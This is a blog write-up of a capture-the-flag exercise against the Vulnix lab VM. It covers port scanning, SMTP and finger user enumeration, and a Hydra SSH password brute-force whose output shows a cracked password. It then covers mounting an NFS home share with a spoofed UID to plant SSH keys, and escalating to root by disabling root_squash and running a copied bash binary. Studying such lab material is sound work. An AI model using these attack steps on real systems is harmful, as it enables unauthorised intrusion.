Back to Posts


Posted in CTF

Networks Engineered to Exploit.
- Windows/UNIX - Domains/Subnets - Initial/Post/Lateral - Low Cost VPN Ranges -


Once the ip of Vulnix is obtained (nmap -sP) our inital nmap scan is ran…

22/tcp    open     ssh            OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 10:cd:9e:a0:e4:e0:30:24:3e:bd:67:5f:75:4a:33:bf (DSA)
|   2048 bc:f9:24:07:2f:cb:76:80:0d:27:a6:48:52:0a:24:3a (RSA)
|_  256 4d:bb:4a:c1:18:e8:da:d1:82:6f:58:52:9c:ee:34:5f (ECDSA)
25/tcp    open     smtp           Postfix smtpd
79/tcp    open     finger         Linux fingerd
|_finger: No one logged on.\x0D
110/tcp   open     pop3           Dovecot pop3d
111/tcp   open     rpcbind        2-4 (RPC #100000)
143/tcp   open     imap           Dovecot imapd
512/tcp   open     exec           netkit-rsh rexecd
513/tcp   open     login          OpenBSD or Solaris rlogind
514/tcp   open     tcpwrapped

A few that catch our attention: SMTP/pop3, rpcbind & SSH.

Since VRFY is available, we can do some quick smtp user enumeration.

root@kali:~# smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t

We see root as a valid user, along with a non-ordinary user of: user

Using finger against user and root we are able to verify they both have /bin/bash available to them.

root@kali:~# finger user@
Login: user           			Name: user
Directory: /home/user               	Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull       			Name: Dovecot login user
Directory: /nonexistent             	Shell: /bin/false
Never logged in.

SSH allows passwords so we run a quick password attack against each user. Using a small password list, root is unsuccessful, but user gets a valid hit.

root@kali:/home# hydra -t 4 -l user -P /home/fasttrack.txt ssh 
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra ( starting at 2017-08-14 08:27:09
[DATA] max 4 tasks per 1 server, overall 64 tasks, 182 login tries (l:1/p:182), ~0 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 64.00 tries/min, 64 tries in 00:01h, 118 to do in 00:02h, 4 active
[STATUS] 62.00 tries/min, 124 tries in 00:02h, 58 to do in 00:01h, 4 active
[22][ssh] host:   login: user   password: letmein
1 of 1 target successfully completed, 1 valid password found
Hydra ( finished at 2017-08-14 08:30:03


Trying multiple kernal exploits are unsuccessful, so enumerating a bit more (/etc/passwd) another user: vulnix is found. For now the plan will be to work on getting access to this account.

We’ll take a step back and keep in mind we have other services exposed, we can take a closer look at rpc/nfs.

We check the mounted directories…

root@kali:~# showmount -e
Export list for
/home/vulnix *

It’s a good thing to initially enumerate thoroughly, instead of rushing down possible vectors wasting time in rabbit holes. We could’ve seen vulnix as a user in our initial smtp user enum scan if a little more prior enum was done. Not a big deal in this case, but an just a note.

root@kali:/mnt/vulnix# mount -t nfs /mnt/vulnix -nolock

We can mount this directory without a problem, but accessing it throws us a permissions error. Since it’s a users home diretory, and ssh is open we can attempt to:

  • Create a local user on our Kali machine named: vulnix. The /home/vulnix exists, and we have root privileges (on our kali machine) to create the user for the already existing /home folder.
  • Since we can read the victims /etc/passwd file we’ll also set the UID to 2008 to our local vulnix user.
  • Accessing this share will then allow use to set generated ssh keys, so we can ssh as vulnix.

First create an ssh folder within the mounted /home/vulnix of:

root@kali:/mnt/vulnix# mkdir .ssh
root@kali:/mnt/vulnix# mkdir .ssh/authorized_keys

Now generate the rsa key pair, and we’ll copy the pub key to the authorized_keys folder.

Now ssh as vulnix and you should get a successful login.

Enumerating as vulnix using sudo -l we see is has sudo privs to /etc/exports (No password). Reading this file something sticks out..

/home/vulnix *(rw,root_squash)
/root  *(rw, no_root_squash)

Change and save to:

/home/vulnix *(rw, no_root_squash) 

The NFS service will need to be restarted in order for the changes to be made (vulnix or user doesnt have permissions to do this) - so reboot the VM.

Once mounted again, we can copy our /bin/bash from our local kali root account to the mounted vulnix folder. We will be able to run bash as root with the -p flag. Since root squashing has been disabled, running this copied root bash binary is possible. This will allow full root access to the system.

Custom Cyber Ranges >>

Read Next

SickOS 1.2